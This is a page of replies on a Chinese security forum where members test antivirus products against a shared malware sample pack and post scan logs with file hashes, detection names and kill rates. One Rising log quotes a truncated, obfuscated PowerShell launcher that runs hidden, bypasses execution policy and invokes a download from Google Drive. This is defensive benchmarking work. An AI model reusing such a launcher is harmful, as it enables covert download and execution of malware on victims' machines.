收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 【开放测试】卡饭病毒样本包 20241101 第181期
123
返回列表 发新帖
楼主: zhuzhu009
 收起左侧

[病毒样本] 【开放测试】卡饭病毒样本包 20241101 第181期

  [复制链接]
ninjagaocc
发表于 2024-11-1 18:59:05 | 显示全部楼层
本帖最后由 ninjagaocc 于 2024-11-1 19:10 编辑

瑞星V17
高级监控✔+人工智能引擎✔
主防16x
右键扫描1x双击后有一个安装包被打开
时间        事件        结果        附加信息        
2024-11-01 18:57:27        文件监控        发现威胁powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?expo ... 4sUOybnH-sDvUhBYwur        文件路径:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?expo ... 4sUOybnH-sDvUhBYwur 相关进程:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe        
2024-11-01 18:57:27        文件监控        发现威胁powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?expo ... 4sUOybnH-sDvUhBYwur        文件路径:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?expo ... 4sUOybnH-sDvUhBYwur 相关进程:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe        
2024-11-01 18:54:13        右键查杀结束        扫描101个对象,发现0个威胁               
2024-11-01 18:54:09        右键查杀开始        ——               
2024-11-01 18:53:39        右键查杀结束        扫描102个对象,发现1个威胁               
2024-11-01 18:53:34        右键查杀开始        ——               
2024-11-01 18:53:28        右键查杀结束        扫描6个对象,发现0个威胁               
2024-11-01 18:53:26        右键查杀开始        ——               
2024-11-01 18:53:18        文件监控        发现威胁567156a0d6fdf21eef06d02450468e6b1c9dfb11d334b2348bccbadc2f3d8d82.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\567156a0d6fdf21eef06d02450468e6b1c9dfb11d334b2348bccbadc2f3d8d82.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:53:18        文件监控        发现威胁1457ee2189e67d3eafc73448c3ce28a65a04fb6fc33b4eb0b375a0b4d782b4bd.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\1457ee2189e67d3eafc73448c3ce28a65a04fb6fc33b4eb0b375a0b4d782b4bd.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:53:17        文件监控        发现威胁82d05f7c1e3d16ba7e22348af4c14533cce64567b024e2149b511c62a85c81bc.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\82d05f7c1e3d16ba7e22348af4c14533cce64567b024e2149b511c62a85c81bc.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:53:17        文件监控        发现威胁7c16b7255a7868abab3dd01209c76b10dc02d60896464f31150e5865d8597a4c.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\7c16b7255a7868abab3dd01209c76b10dc02d60896464f31150e5865d8597a4c.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:52:49        文件监控        发现威胁d2251823b45caff61e3df577191014dd08f093e6643a94241a4ae5d1c4d480e6.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\d2251823b45caff61e3df577191014dd08f093e6643a94241a4ae5d1c4d480e6.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:52:48        文件监控        发现威胁f370ae6a49126a86d98f7f1d3ce1882f660e63873b8152f65feb69367ca843a2.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\f370ae6a49126a86d98f7f1d3ce1882f660e63873b8152f65feb69367ca843a2.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:52:48        文件监控        发现威胁e67d6647a2d22e9f4fcde38dc5f6b88a0a34da76108d95272b5bbbffadfdee13.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\e67d6647a2d22e9f4fcde38dc5f6b88a0a34da76108d95272b5bbbffadfdee13.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:52:47        文件监控        发现威胁dee4c51957968519796f1d6945b8694b464a17d8d49cc247c434c45b0230776a.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\dee4c51957968519796f1d6945b8694b464a17d8d49cc247c434c45b0230776a.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:52:47        文件监控        发现威胁c147dcdb6a66aec36d286112247f56da31301cbd5773ec47174ec2b00734a40e.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\c147dcdb6a66aec36d286112247f56da31301cbd5773ec47174ec2b00734a40e.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:52:46        文件监控        发现威胁bd4beff45c77e1045bd78a72e0dbd8700f18d088a57ce444eb2b8a5422035bbf.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\bd4beff45c77e1045bd78a72e0dbd8700f18d088a57ce444eb2b8a5422035bbf.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:52:45        文件监控        发现威胁643c012cca1a54296f56286fd4a727e7c379e2e14c5b81b5d5d0c59e20e4aeee.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\643c012cca1a54296f56286fd4a727e7c379e2e14c5b81b5d5d0c59e20e4aeee.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:52:45        文件监控        发现威胁101a452b011542f077755d39900d85449ef9d6f8d357c3e2c89b995fac665493.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\101a452b011542f077755d39900d85449ef9d6f8d357c3e2c89b995fac665493.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:52:45        文件监控        发现威胁66c7b70ab45668ccf79506762e35bfbd22ab6c07689fc0fe41f202336f516688.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\66c7b70ab45668ccf79506762e35bfbd22ab6c07689fc0fe41f202336f516688.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:52:44        文件监控        发现威胁9dc81152df661d18744a5f353629c1cb432c28b6f9fabe8a4405f285b58ac41a.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\9dc81152df661d18744a5f353629c1cb432c28b6f9fabe8a4405f285b58ac41a.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:52:42        文件监控        发现威胁inssetup.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\inssetup.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:52:41        文件监控        发现威胁fceda118c3aef32d1d7ba4682b75cd9b81423544b820f02acbb6e99f10eb5813.exe        文件路径:C:\Users\WDAGUtilityAccount\Desktop\infected20241101\fceda118c3aef32d1d7ba4682b75cd9b81423544b820f02acbb6e99f10eb5813.exe 相关进程:C:\Windows\Explorer.EXE        
2024-11-01 18:50:28        产品升级        升级到版本25.00.10.35                



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +25 收起 理由
QVM360 + 25 版区有你更精彩: )

查看全部评分

回复

举报

xmt12
发表于 2024-11-1 19:52:41 | 显示全部楼层
自制(我嘞个特征盛世
  1. XAS扫描日志
  2. ---------------
  3. 扫描开始时间:2024/11/1 19:51:57


  6. 危险文件:
  7. ---------

  9. D:/用户文件/2/桌面/infected20241101\101a452b011542f077755d39900d85449ef9d6f8d357c3e2c89b995fac665493.exe[XAS特征引擎][Trojan.Generic!id=BFE4957E]
  10. D:/用户文件/2/桌面/infected20241101\1457ee2189e67d3eafc73448c3ce28a65a04fb6fc33b4eb0b375a0b4d782b4bd.exe[XAS特征引擎][Trojan.Generic!id=51A3141B]
  11. D:/用户文件/2/桌面/infected20241101\2369682a410e0b6aee1180d411eea77ee8942c58845f28d6afa79a1b5b4152ac.exe[XAS特征引擎][Trojan.Generic!id=E0EF694F]
  12. D:/用户文件/2/桌面/infected20241101\567156a0d6fdf21eef06d02450468e6b1c9dfb11d334b2348bccbadc2f3d8d82.exe[XAS特征引擎][Trojan.Generic!id=51A3141B]
  13. D:/用户文件/2/桌面/infected20241101\643c012cca1a54296f56286fd4a727e7c379e2e14c5b81b5d5d0c59e20e4aeee.exe[XAS特征引擎][Trojan.Generic!id=BFE4957E]
  14. D:/用户文件/2/桌面/infected20241101\66c7b70ab45668ccf79506762e35bfbd22ab6c07689fc0fe41f202336f516688.exe[XAS特征引擎][Trojan.Generic!id=BFE4957E]
  15. D:/用户文件/2/桌面/infected20241101\7c16b7255a7868abab3dd01209c76b10dc02d60896464f31150e5865d8597a4c.exe[XAS特征引擎][Trojan.Generic!id=92849837]
  16. D:/用户文件/2/桌面/infected20241101\82d05f7c1e3d16ba7e22348af4c14533cce64567b024e2149b511c62a85c81bc.exe[XAS特征引擎][Trojan.Generic!id=FB3337C4]
  17. D:/用户文件/2/桌面/infected20241101\8f5f0c650e1be6845d4a7445c8232acd5b8ec1d45cd070748131e9ee4ebe3d67.exe[XAS特征引擎][Trojan.Generic!id=E0EF694F]
  18. D:/用户文件/2/桌面/infected20241101\9dc81152df661d18744a5f353629c1cb432c28b6f9fabe8a4405f285b58ac41a.exe[XAS特征引擎][Trojan.Generic!id=92849837]
  19. D:/用户文件/2/桌面/infected20241101\bd4beff45c77e1045bd78a72e0dbd8700f18d088a57ce444eb2b8a5422035bbf.exe[XAS特征引擎][Trojan.Generic!id=BFE4957E]
  20. D:/用户文件/2/桌面/infected20241101\c147dcdb6a66aec36d286112247f56da31301cbd5773ec47174ec2b00734a40e.exe[XAS特征引擎][Trojan.Generic!id=92849837]
  21. D:/用户文件/2/桌面/infected20241101\d2251823b45caff61e3df577191014dd08f093e6643a94241a4ae5d1c4d480e6.exe[ANK云引擎][Trojan(0.8898)]
  22. D:/用户文件/2/桌面/infected20241101\dee4c51957968519796f1d6945b8694b464a17d8d49cc247c434c45b0230776a.exe[XAS特征引擎][Trojan.Generic!id=BFE4957E]
  23. D:/用户文件/2/桌面/infected20241101\e67d6647a2d22e9f4fcde38dc5f6b88a0a34da76108d95272b5bbbffadfdee13.exe[XAS特征引擎][Trojan.Generic!id=92849837]
  24. D:/用户文件/2/桌面/infected20241101\f370ae6a49126a86d98f7f1d3ce1882f660e63873b8152f65feb69367ca843a2.exe[XAS特征引擎][Trojan.Generic!id=BFE4957E]
  25. D:/用户文件/2/桌面/infected20241101\fceda118c3aef32d1d7ba4682b75cd9b81423544b820f02acbb6e99f10eb5813.exe[XAS特征引擎][Trojan.Generic!id=92849837]

  27. 总文件数:23
  28. 病毒文件个数:17
  29. 查杀率:73.91%
  30. 扫描结束时间:2024/11/1 19:52:03
复制代码
EIS 21x
  1. 扫描日志
  2. 检测引擎的版本: 30149 (20241101)
  3. 日期: 2024/11/1  时间: 19:52:48
  4. 已扫描的磁盘、文件夹和文件: D:\用户文件\2\桌面\infected20241101
  5. 用户: DESKTOP-L19RJQU\x
  6. D:\用户文件\2\桌面\infected20241101\e67d6647a2d22e9f4fcde38dc5f6b88a0a34da76108d95272b5bbbffadfdee13.exe - MSIL/Autorun.Spy.Agent.R 蠕虫 的变量 - 已保留
  7. D:\用户文件\2\桌面\infected20241101\101a452b011542f077755d39900d85449ef9d6f8d357c3e2c89b995fac665493.exe - Win32/Packed.Themida.HZB 特洛伊木马 的变量 - 已保留
  8. D:\用户文件\2\桌面\infected20241101\f370ae6a49126a86d98f7f1d3ce1882f660e63873b8152f65feb69367ca843a2.exe - Win32/Packed.Themida.HZB 特洛伊木马 的变量 - 已保留
  9. D:\用户文件\2\桌面\infected20241101\fceda118c3aef32d1d7ba4682b75cd9b81423544b820f02acbb6e99f10eb5813.exe - MSIL/Bladabindi.BC 特洛伊木马 - 已保留
  10. D:\用户文件\2\桌面\infected20241101\1457ee2189e67d3eafc73448c3ce28a65a04fb6fc33b4eb0b375a0b4d782b4bd.exe > AUTOIT > script.bin - Win32/Autoit.ORL 特洛伊木马 的变量 - 已保留
  11. D:\用户文件\2\桌面\infected20241101\inssetup.exe - Win64/GenKryptik.HDHU 特洛伊木马 的变量 - 已保留
  12. D:\用户文件\2\桌面\infected20241101\2369682a410e0b6aee1180d411eea77ee8942c58845f28d6afa79a1b5b4152ac.exe - Win32/Injector.Autoit.GOI 特洛伊木马 的变量 - 已保留
  13. D:\用户文件\2\桌面\infected20241101\2524d710a801247061b127f4206437e3e26278bdfe392ff3090a1c5cdc3aa937.msi - Generik.KTIAGLT 特洛伊木马 的变量 - 已保留
  14. D:\用户文件\2\桌面\infected20241101\567156a0d6fdf21eef06d02450468e6b1c9dfb11d334b2348bccbadc2f3d8d82.exe > AUTOIT > script.bin - Win32/Autoit.ORL 特洛伊木马 的变量 - 已保留
  15. D:\用户文件\2\桌面\infected20241101\643c012cca1a54296f56286fd4a727e7c379e2e14c5b81b5d5d0c59e20e4aeee.exe - Win32/Packed.Themida.HZB 特洛伊木马 的变量 - 已保留
  16. D:\用户文件\2\桌面\infected20241101\66c7b70ab45668ccf79506762e35bfbd22ab6c07689fc0fe41f202336f516688.exe - Win32/Packed.Themida.HZB 特洛伊木马 的变量 - 已保留
  17. D:\用户文件\2\桌面\infected20241101\7c16b7255a7868abab3dd01209c76b10dc02d60896464f31150e5865d8597a4c.exe - MSIL/GenKryptik.HDGD 特洛伊木马 的变量 - 已保留
  18. D:\用户文件\2\桌面\infected20241101\82d05f7c1e3d16ba7e22348af4c14533cce64567b024e2149b511c62a85c81bc.exe - Win32/Rescoms.B 特洛伊木马 的变量 - 已保留
  19. D:\用户文件\2\桌面\infected20241101\8f5f0c650e1be6845d4a7445c8232acd5b8ec1d45cd070748131e9ee4ebe3d67.exe - Win32/Injector.Autoit.GOF 特洛伊木马 的变量 - 已保留
  20. D:\用户文件\2\桌面\infected20241101\9dc81152df661d18744a5f353629c1cb432c28b6f9fabe8a4405f285b58ac41a.exe - MSIL/TrojanDropper.Agent.GGG 特洛伊木马 的变量 - 已保留
  21. D:\用户文件\2\桌面\infected20241101\a90b47db3b8967d11477fddf847f7e2edd6933462b90998fc4b32ae4023348fa.doc > ZIP > word/_rels/settings.xml.rels - VBA/Subdoc.B 特洛伊木马 - 已保留
  22. D:\用户文件\2\桌面\infected20241101\bd4beff45c77e1045bd78a72e0dbd8700f18d088a57ce444eb2b8a5422035bbf.exe - Win32/Packed.Themida.HZB 特洛伊木马 的变量 - 已保留
  23. D:\用户文件\2\桌面\infected20241101\bef0af387fe44cd78c261d4374ca93e940ed0ef55e7055d4a9fd5246a4913768.vbs - PowerShell/TrojanDownloader.Agent.JMU 特洛伊木马 - 已保留
  24. D:\用户文件\2\桌面\infected20241101\c147dcdb6a66aec36d286112247f56da31301cbd5773ec47174ec2b00734a40e.exe - MSIL/Autorun.Spy.Agent.R 蠕虫 的变量 - 已保留
  25. D:\用户文件\2\桌面\infected20241101\d2251823b45caff61e3df577191014dd08f093e6643a94241a4ae5d1c4d480e6.exe > NSIS > Script.nsi - NSIS/Injector.DDN 特洛伊木马 - 已保留
  26. D:\用户文件\2\桌面\infected20241101\dee4c51957968519796f1d6945b8694b464a17d8d49cc247c434c45b0230776a.exe - Win32/Packed.Themida.HZB 特洛伊木马 的变量 - 已保留
  27. 已扫描的对象数: 85
  28. 检测数: 21
  29. 已清除的对象数: 0
  30. 完成时间: 19:52:55  总扫描时间: 7 秒 (00:00:07)
复制代码



评分

参与人数 1经验 +20 收起 理由
QVM360 + 20 版区有你更精彩: )

查看全部评分

回复

举报

心醉咖啡
发表于 2024-11-1 20:01:55 | 显示全部楼层
本帖最后由 心醉咖啡 于 2024-11-1 20:03 编辑

金山毒霸
  1. 扫描时间:[2024-11-01 20:02:24]
  2. 扫描用时:[00:00:07]
  3. 扫描类型:自定义查杀
  4. 扫描文件总数:65
  5. 扫描速度:8文件/秒
  6. 发现威胁:22个
  7. 清除威胁:22个
  8. =============================================
  9. [2024-11-01 20:02:48]
  10. 威胁:e:\浏览器下载\infected20241101\101a452b011542f077755d39900d85449ef9d6f8d357c3e2c89b995fac665493.exe
  11. 类型:win32.heurc.kvmh008.a.(kcloud)
  12. 处理方式:删除

  14. [2024-11-01 20:02:48]
  15. 威胁:e:\浏览器下载\infected20241101\1457ee2189e67d3eafc73448c3ce28a65a04fb6fc33b4eb0b375a0b4d782b4bd.exe
  16. 类型:win32.troj.unknown.a.(kcloud)
  17. 处理方式:删除

  19. [2024-11-01 20:02:48]
  20. 威胁:e:\浏览器下载\infected20241101\2369682a410e0b6aee1180d411eea77ee8942c58845f28d6afa79a1b5b4152ac.exe
  21. 类型:win32.trojan.obfus.gen.(kcloud)
  22. 处理方式:删除

  24. [2024-11-01 20:02:48]
  25. 威胁:e:\浏览器下载\infected20241101\2524d710a801247061b127f4206437e3e26278bdfe392ff3090a1c5cdc3aa937.msi
  26. 类型:win32.troj.unknown.a.(kcloud)
  27. 处理方式:删除

  29. [2024-11-01 20:02:48]
  30. 威胁:e:\浏览器下载\infected20241101\567156a0d6fdf21eef06d02450468e6b1c9dfb11d334b2348bccbadc2f3d8d82.exe
  31. 类型:win32.troj.unknown.a.(kcloud)
  32. 处理方式:删除

  34. [2024-11-01 20:02:48]
  35. 威胁:e:\浏览器下载\infected20241101\8f5f0c650e1be6845d4a7445c8232acd5b8ec1d45cd070748131e9ee4ebe3d67.exe
  36. 类型:win64.trojan.injects.emw.(kcloud)
  37. 处理方式:删除

  39. [2024-11-01 20:02:48]
  40. 威胁:e:\浏览器下载\infected20241101\a3fddc5f8fdb4f125ad3604d28d603947a6ccf1dacbc1fbb910d3c773f70dcbe.xlsx
  41. 类型:win32.troj.undef.a.(kcloud)
  42. 处理方式:修复

  44. [2024-11-01 20:02:48]
  45. 威胁:e:\浏览器下载\infected20241101\4e11f8c96a579711eff961da1b26ca6613f62559a7292a66933f9bbdadccdf1b.hta
  46. 类型:script.trojan.generic.a.(kcloud)
  47. 处理方式:删除

  49. [2024-11-01 20:02:48]
  50. 威胁:e:\浏览器下载\infected20241101\643c012cca1a54296f56286fd4a727e7c379e2e14c5b81b5d5d0c59e20e4aeee.exe
  51. 类型:win32.heurc.kvmh008.a.(kcloud)
  52. 处理方式:删除

  54. [2024-11-01 20:02:48]
  55. 威胁:e:\浏览器下载\infected20241101\66c7b70ab45668ccf79506762e35bfbd22ab6c07689fc0fe41f202336f516688.exe
  56. 类型:win32.heurc.kvmh008.a.(kcloud)
  57. 处理方式:删除

  59. [2024-11-01 20:02:48]
  60. 威胁:e:\浏览器下载\infected20241101\7c16b7255a7868abab3dd01209c76b10dc02d60896464f31150e5865d8597a4c.exe
  61. 类型:msil.trojan-spy.noon.gen.(kcloud)
  62. 处理方式:删除

  64. [2024-11-01 20:02:48]
  65. 威胁:e:\浏览器下载\infected20241101\82d05f7c1e3d16ba7e22348af4c14533cce64567b024e2149b511c62a85c81bc.exe
  66. 类型:win32.hack.remcos.gen.(kcloud)
  67. 处理方式:删除

  69. [2024-11-01 20:02:48]
  70. 威胁:e:\浏览器下载\infected20241101\9dc81152df661d18744a5f353629c1cb432c28b6f9fabe8a4405f285b58ac41a.exe
  71. 类型:msil.trojan.injuke.gen.(kcloud)
  72. 处理方式:删除

  74. [2024-11-01 20:02:48]
  75. 威胁:e:\浏览器下载\infected20241101\a90b47db3b8967d11477fddf847f7e2edd6933462b90998fc4b32ae4023348fa.doc
  76. 类型:win32.troj.undef.a.(kcloud)
  77. 处理方式:修复

  79. [2024-11-01 20:02:48]
  80. 威胁:e:\浏览器下载\infected20241101\d2251823b45caff61e3df577191014dd08f093e6643a94241a4ae5d1c4d480e6.exe
  81. 类型:win32.trojan.makoob.gen.(kcloud)
  82. 处理方式:删除

  84. [2024-11-01 20:02:48]
  85. 威胁:e:\浏览器下载\infected20241101\bd4beff45c77e1045bd78a72e0dbd8700f18d088a57ce444eb2b8a5422035bbf.exe
  86. 类型:win32.heurc.kvmh008.a.(kcloud)
  87. 处理方式:删除

  89. [2024-11-01 20:02:48]
  90. 威胁:e:\浏览器下载\infected20241101\c147dcdb6a66aec36d286112247f56da31301cbd5773ec47174ec2b00734a40e.exe
  91. 类型:win32.trojan.generic.a.(kcloud)
  92. 处理方式:删除

  94. [2024-11-01 20:02:48]
  95. 威胁:e:\浏览器下载\infected20241101\dee4c51957968519796f1d6945b8694b464a17d8d49cc247c434c45b0230776a.exe
  96. 类型:win32.heurc.kvmh008.a.(kcloud)
  97. 处理方式:删除

  99. [2024-11-01 20:02:48]
  100. 威胁:e:\浏览器下载\infected20241101\e67d6647a2d22e9f4fcde38dc5f6b88a0a34da76108d95272b5bbbffadfdee13.exe
  101. 类型:win32.trojan.generic.a.(kcloud)
  102. 处理方式:删除

  104. [2024-11-01 20:02:48]
  105. 威胁:e:\浏览器下载\infected20241101\f370ae6a49126a86d98f7f1d3ce1882f660e63873b8152f65feb69367ca843a2.exe
  106. 类型:win32.heurc.kvmh008.a.(kcloud)
  107. 处理方式:删除

  109. [2024-11-01 20:02:48]
  110. 威胁:e:\浏览器下载\infected20241101\fceda118c3aef32d1d7ba4682b75cd9b81423544b820f02acbb6e99f10eb5813.exe
  111. 类型:win32.trojan.generic.a.(kcloud)
  112. 处理方式:删除

  114. [2024-11-01 20:02:48]
  115. 威胁:e:\浏览器下载\infected20241101\inssetup.exe
  116. 类型:win32.trojan.inject.a.(kcloud)
  117. 处理方式:删除

复制代码

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +10 收起 理由
QVM360 + 10 版区有你更精彩: )

查看全部评分

回复

举报

ninjagaocc
发表于 2024-11-1 20:06:41 | 显示全部楼层
本帖最后由 ninjagaocc 于 2024-11-1 20:09 编辑

安博士
主防14x ,右键扫描修复1x,剩余8x

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +10 收起 理由
QVM360 + 10 版区有你更精彩: )

查看全部评分

回复

举报

飞鸟相与还
头像被屏蔽
发表于 2024-11-2 14:29:08 | 显示全部楼层
360 kill all

评分

参与人数 1经验 +5 收起 理由
QVM360 + 5 版区有你更精彩: )

查看全部评分

回复

举报

qq150234
发表于 2024-11-6 16:00:55 | 显示全部楼层
环境win10
卡巴斯基 kts
全kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

123
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-7 09:06 , Processed in 0.148424 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表